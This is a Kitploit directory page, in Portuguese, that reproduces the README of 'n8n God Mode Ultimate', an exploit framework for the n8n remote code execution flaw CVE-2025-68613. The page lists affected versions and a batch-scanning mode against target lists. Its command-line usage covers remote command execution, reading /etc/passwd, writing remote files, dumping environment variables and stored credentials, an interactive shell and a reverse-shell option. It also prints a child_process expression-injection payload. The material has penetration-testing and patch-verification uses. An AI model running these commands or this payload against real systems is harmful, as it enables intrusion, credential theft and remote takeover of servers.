Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
n8n-exploit-CVE-2025-68613-n8n-God-Mode-Ultimate — n8n God Mode Ultimate - CVE-2025-68613 Scanner v1.0.0 ║ ║ Execução Remota de Código em Automação de Fluxo de Trabalho | Kitploit
Ferramentas/GitHubGitHub/hackersatyamrastogi/n8n-exploit-cve-2025-68613-n8n-god-mode-ultimate
Scanners de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesPós-ExploraçãoTestes de PenetraçãoComando e ControleAprendizado e EducaçãoRed Teaming
Ferramenta de Acesso Remoto
Desenvolvimento de Payloads
GitHubhackersatyamrastogi/n8n-exploit-cve-2025-68613-n8n-god-mode-ultimate

n8n-exploit-CVE-2025-68613-n8n-God-Mode-Ultimate

n8n God Mode Ultimate - CVE-2025-68613 Scanner v1.0.0 ║ ║ Execução Remota de Código em Automação de Fluxo de Trabalho

Ver Repositório
5314há 9 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

n8n God Mode Ultimate - Scanner & Framework de Exploração CVE-2025-68613

n8n God Mode Ultimate

Scanner RCE Avançado de Automação de Workflows n8n e Ferramenta de Exploração

Python Version License CVE CVSS Score


🎯 Visão Geral

n8n God Mode Ultimate é um framework abrangente de teste de segurança projetado para detectar e validar o CVE-2025-68613 em plataformas de automação de workflows n8n. Esta vulnerabilidade crítica de Execução Remota de Código (RCE) afeta versões do n8n através de injeção de expressões em contextos de execução de workflows.

Detalhes do CVE-2025-68613

  • Pontuação CVSS: 10.0 (Crítica)
  • Vetor de Ataque: Rede
  • Complexidade do Ataque: Baixa
  • Privilégios Necessários: Baixos (credenciais válidas)
  • Interação do Usuário: Nenhuma
  • Tipo de Vulnerabilidade: Injeção de Expressão → Execução Remota de Código

Versões Afetadas:

  • n8n >= 0.211.0 and < 1.120.4
  • n8n >= 1.121.0 and < 1.121.1

Versões Corrigidas:

  • n8n >= 1.120.4
  • n8n >= 1.121.1
  • n8n >= 1.122.0

✨ Funcionalidades

🔍 Detecção e Varredura

  • Detecção Inteligente de Versão - Extrai a versão do n8n a partir dos metadados da página de login
  • Varredura em Lote - Varredura concorrente multi-thread de alvos com rastreamento de progresso
  • Múltiplos Modos de Varredura:
    • --detect - Apenas detecção de versão (mais rápida, não intrusiva)
    • --safe - Verificação segura de vulnerabilidade sem exploração
    • --poc - Validação de prova de conceito RCE
    • --exploit - Modo de exploração completo

💣 Capacidades de Exploração

  • 4 Técnicas de Exploração:
    1. Gatilho Agendado - Workflow de execução automática (mais confiável)
    2. Gatilho Webhook - Execução acionada por HTTP
    3. Nó de Código - Acesso direto ao child_process
    4. Injeção de Expressão - Execução manual de expressão

🎮 Funcionalidades do Modo Deus

  • Shell Interativo - Shell remoto completo com histórico de comandos
  • Operações de Arquivo:
    • read <file> - Ler arquivos remotos
    • write <file> <content> - Escrever arquivos no alvo
  • Extração de Ambiente - Despejar todas as variáveis de ambiente
  • Informações do Sistema - Detalhes do SO, configuração de rede, informações de processo
  • Reverse Shell - Geração opcional de payload de reverse shell
  • Histórico de Comandos - Rastreamento de histórico embutido

📊 Capacidades Avançadas

  • Enumeração de Credenciais - Extrai credenciais armazenadas via API
  • Despejo de Workflows - Exporta todos os workflows com metadados
  • Extração de Configuração - Despejo completo da configuração do sistema
  • Enumeração de Usuários - Lista todos os usuários do n8n
  • Análise de Log de Execução - Analisa saídas de comandos de execuções de workflows
  • Limpeza Automatizada - Exclusão opcional de workflows após a execução

🚀 Instalação

Pré-requisitos

# Python 3.8 ou superior
python3 --version

# gerenciador de pacotes pip
pip3 --version

Instalar Dependências

# Clone o repositório
git clone https://github.com/hackersatyamrastogi/n8n-exploit-CVE-2025-68613-n8n-God-Mode-Ultimate.git
cd n8n-exploit-CVE-2025-68613-n8n-God-Mode-Ultimate

# Instale os pacotes necessários
pip3 install -r requirements.txt

Requisitos

requests>=2.31.0
urllib3>=2.0.0
tqdm>=4.66.0
colorama>=0.4.6

📖 Uso

Uso Básico

# Exibir menu de ajuda
python3 n8n-godmode-ultimate.py -h

# Detectar versão do n8n (não intrusivo)
python3 n8n-godmode-ultimate.py -u http://target:5678 --detect

# Verificação segura de vulnerabilidade
python3 n8n-godmode-ultimate.py -u http://target:5678 --safe -e [email protected] -p password

# Prova de conceito RCE
python3 n8n-godmode-ultimate.py -u http://target:5678 --poc -e [email protected] -p password

# Exploração completa
python3 n8n-godmode-ultimate.py -u http://target:5678 --exploit -e [email protected] -p password

Operações do Modo Deus

# Executar comando único
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
  -e [email protected] -p password --cmd "whoami"

# Ler arquivo remoto
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
  -e [email protected] -p password --read-file "/etc/passwd"

# Escrever arquivo remoto
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
  -e [email protected] -p password --write-file "/tmp/test.txt" --content "payload"

# Extrair variáveis de ambiente
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
  -e [email protected] -p password --dump-env

# Shell interativo
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
  -e [email protected] -p password --shell

Varredura em Lote

# Escanear múltiplos alvos a partir de arquivo
python3 n8n-godmode-ultimate.py -l targets.txt --detect -t 20

# Exploração em lote
python3 n8n-godmode-ultimate.py -l targets.txt --poc -e [email protected] -p password -t 10

Formato do targets.txt:

http://target1:5678
https://target2.example.com
http://192.168.1.100:5678
https://n8n.example.org

Comandos do Shell Interativo

Uma vez no modo shell (--shell):

n8n> whoami              # Executar comando
n8n> read /etc/passwd    # Ler arquivo
n8n> env                 # Mostrar variáveis de ambiente
n8n> info                # Informações do sistema
n8n> history             # Histórico de comandos
n8n> exit                # Sair do shell

🛠️ Opções de Linha de Comando

Opções de Alvo

-u, --url URL             URL do n8n alvo
-l, --list FILE           Arquivo contendo URLs dos alvos
-t, --threads NUM         Número de threads para varredura em lote (padrão: 10)

Autenticação

-e, --email EMAIL         Email do usuário n8n
-p, --password PASS       Senha do usuário n8n

Modos de Varredura

--detect                  Apenas detecção de versão (mais rápida)
--safe                    Verificação segura sem exploração
--poc                     Prova de conceito RCE
--exploit                 Modo de exploração completo

Modo Deus

--god                     Ativar modo deus
--cmd COMMAND             Executar comando único
--read-file PATH          Ler arquivo remoto
--write-file PATH         Escrever arquivo remoto
--content DATA            Conteúdo para operação de escrita
--dump-env                Extrair todas as variáveis de ambiente
--shell                   Modo shell interativo
--revshell HOST:PORT      Payload de reverse shell

Opções de Exploração

--mode MODE               Modo de exploração: schedule|webhook|code|expression (padrão: schedule)
--timeout SEC             Tempo limite do comando em segundos (padrão: 30)
--cleanup                 Excluir workflows após a execução
-k, --insecure           Desabilitar verificação SSL
-v, --verbose            Saída detalhada
-q, --quiet              Saída mínima

🔬 Detalhes Técnicos

Metodologia de Exploração

1. Gatilho Agendado (Recomendado)

Cria um workflow com um gatilho agendado que executa automaticamente a cada 3 segundos. Método mais confiável.

Payload: {{(function(){
  return this.process.mainModule.require('child_process')
    .execSync('whoami').toString()
})()}}

2. Gatilho Webhook

Cria um endpoint webhook HTTP que executa comandos quando acionado.

Baixar ferramenta